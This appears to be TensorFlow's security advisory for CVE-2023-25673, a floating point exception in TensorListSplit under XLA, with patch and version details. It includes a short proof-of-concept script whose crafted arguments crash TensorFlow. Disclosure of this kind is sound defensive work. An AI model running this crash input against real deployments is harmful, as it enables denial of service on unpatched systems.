## TFSA-2023-013: FPE in TensorListSplit with XLA 

### CVE Number
CVE-2023-25673

### Impact
FPE in TensorListSplit with XLA 
```python
import tensorflow as tf

func = tf.raw_ops.TensorListSplit
para = {'tensor': [1], 'element_shape': -1, 'lengths': [0]}

@tf.function(jit_compile=True)
def fuzz_jit():
 y = func(**para)
 return y

print(fuzz_jit())
```

### Patches
We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).

The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by r3pwnx